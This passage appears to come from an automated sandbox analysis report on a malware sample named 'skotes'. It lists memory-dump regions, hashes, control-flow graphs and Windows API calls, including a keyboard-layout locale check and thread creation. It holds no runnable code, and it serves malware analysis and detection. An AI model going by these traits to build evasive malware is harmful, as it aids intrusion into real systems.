                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnumOpenValue
                                                                                                                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                                • API String ID: 2571532894-3963862150
                                                                                                                                                                                                                                                                • Opcode ID: 32a4e815f7c92e8284221984e79280006f8bebf05c36948adeb50fe6ef95ab06
                                                                                                                                                                                                                                                                • Instruction ID: 36ee06b77ce4b913042f835cbdae7bbcd1fd5c81be111c31cf3e9470b4a4d95e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32a4e815f7c92e8284221984e79280006f8bebf05c36948adeb50fe6ef95ab06
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81B1C0719002689BEB24DB64CD84BDEB7B9AF05340F5402D9E108E72D2DB74AFA8CF54

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1903 ae1abc-ae1aec call ae180a 1906 ae1aee-ae1af9 call ad75e3 1903->1906 1907 ae1b07-ae1b13 call adbf3a 1903->1907 1912 ae1afb-ae1b02 call ad75f6 1906->1912 1913 ae1b2c-ae1b75 call ae1775 1907->1913 1914 ae1b15-ae1b2a call ad75e3 call ad75f6 1907->1914 1924 ae1de1-ae1de5 1912->1924 1922 ae1b77-ae1b80 1913->1922 1923 ae1be2-ae1beb GetFileType 1913->1923 1914->1912 1928 ae1bb7-ae1bdd call ad75c0 1922->1928 1929 ae1b82-ae1b86 1922->1929 1925 ae1bed-ae1c1e call ad75c0 1923->1925 1926 ae1c34-ae1c37 1923->1926 1925->1912 1951 ae1c24-ae1c2f call ad75f6 1925->1951 1931 ae1c39-ae1c3e 1926->1931 1932 ae1c40-ae1c46 1926->1932 1928->1912 1929->1928 1930 ae1b88-ae1bb5 call ae1775 1929->1930 1930->1923 1930->1928 1935 ae1c4a-ae1c98 call adbe85 1931->1935 1932->1935 1937 ae1c48 1932->1937 1945 ae1c9a-ae1ca6 call ae1984 1935->1945 1946 ae1cb7-ae1cdf call ae1522 1935->1946 1937->1935 1945->1946 1953 ae1ca8 1945->1953 1955 ae1ce4-ae1d25 1946->1955 1956 ae1ce1-ae1ce2 1946->1956 1951->1912 1957 ae1caa-ae1cb2 call adaf48 1953->1957 1959 ae1d46-ae1d54 1955->1959 1960 ae1d27-ae1d2b 1955->1960 1956->1957 1957->1924 1962 ae1ddf 1959->1962 1963 ae1d5a-ae1d5e 1959->1963 1960->1959 1961 ae1d2d-ae1d41 1960->1961 1961->1959 1962->1924 1963->1962 1965 ae1d60-ae1d93 call ae1775 1963->1965 1970 ae1dc7-ae1ddb 1965->1970 1971 ae1d95-ae1dc1 call ad75c0 call adc04d 1965->1971 1970->1962 1971->1970
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AE1775: CreateFileW.KERNEL32(00000000,00000000,?,00AE1B65,?,?,00000000,?,00AE1B65,00000000,0000000C), ref: 00AE1792
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00AE1BD7
                                                                                                                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 00AE1BE3
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00AE1BF6
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00AE1D9C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                • API String ID: 3443242726-2852464175
                                                                                                                                                                                                                                                                • Opcode ID: e9ff80e2f2649a742d8eb72a82e2108a2a2bed73fdea5e14d3fda22689a58f98
                                                                                                                                                                                                                                                                • Instruction ID: 94b8fb7965f6375068a2f0327f5d364702e676b1167a249fb4bb312756fc6817
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9ff80e2f2649a742d8eb72a82e2108a2a2bed73fdea5e14d3fda22689a58f98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51A13932A041988FCF199F68DD91BAE3BB1AB46324F240159F812EF3D1EB359D12C751

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2189 aa7590-aa75e1 Sleep 2190 aa75e3-aa75f7 call abd111 2189->2190 2191 aa7661-aa76d7 call ab80c0 * 3 CreateThread Sleep 2189->2191 2190->2191 2197 aa75f9-aa765e call abd64e call abd0c7 2190->2197 2204 aa76d9-aa76e5 2191->2204 2205 aa7705-aa771d 2191->2205 2197->2191 2207 aa76fb-aa7702 call abd663 2204->2207 2208 aa76e7-aa76f5 2204->2208 2209 aa771f-aa772b 2205->2209 2210 aa7747-aa775f 2205->2210 2207->2205 2208->2207 2213 aa779b-aa77a0 call ad6c6a 2208->2213 2215 aa773d-aa7744 call abd663 2209->2215 2216 aa772d-aa773b 2209->2216 2211 aa7789-aa779a 2210->2211 2212 aa7761-aa776d 2210->2212 2217 aa777f-aa7786 call abd663 2212->2217 2218 aa776f-aa777d 2212->2218 2215->2210 2216->2213 2216->2215 2217->2211 2218->2213 2218->2217
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,61AD01A7,?,00000000,00AE9138,000000FF), ref: 00AA75CC
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AA7430,00B08638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00AA76BF
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AA76C9
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABD0C7: RtlWakeAllConditionVariable.NTDLL ref: 00ABD17B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 79123409-0
                                                                                                                                                                                                                                                                • Opcode ID: dbf4de008ef21e231eab3f9c7ecd338241db0309c9d76837dbded3dc6f0491ad
                                                                                                                                                                                                                                                                • Instruction ID: d70a69a741716f0541e3deca77ad932c86c0482fe3ee9b63bf2db69b1e2e581a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbf4de008ef21e231eab3f9c7ecd338241db0309c9d76837dbded3dc6f0491ad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD51FD70210244AFEB08DF28DD85B8E3BA5EB55304F504629F845873E2DF7A9680CB91

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2226 ad6fb4-ad6fe9 GetFileType 2227 ad6fef-ad6ffa 2226->2227 2228 ad70a1-ad70a4 2226->2228 2229 ad701c-ad7038 call ad40f0 GetFileInformationByHandle 2227->2229 2230 ad6ffc-ad700d call ad732a 2227->2230 2231 ad70cd-ad70f5 2228->2231 2232 ad70a6-ad70a9 2228->2232 2242 ad70be-ad70cb call ad75c0 2229->2242 2247 ad703e-ad7080 call ad727c call ad7124 * 3 2229->2247 2244 ad70ba-ad70bc 2230->2244 2245 ad7013-ad701a 2230->2245 2233 ad70f7-ad710a 2231->2233 2234 ad7112-ad7114 2231->2234 2232->2231 2237 ad70ab-ad70ad 2232->2237 2233->2234 2249 ad710c-ad710f 2233->2249 2239 ad7115-ad7123 call abcff1 2234->2239 2241 ad70af-ad70b4 call ad75f6 2237->2241 2237->2242 2241->2244 2242->2244 2244->2239 2245->2229 2262 ad7085-ad709d call ad7249 2247->2262 2249->2234 2262->2234 2265 ad709f 2262->2265 2265->2244
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00AD6EE6), ref: 00AD6FD6
                                                                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00AD7030
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00AD70C5
                                                                                                                                                                                                                                                                  • Part of subcall function 00AD732A: __dosmaperr.LIBCMT ref: 00AD735F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
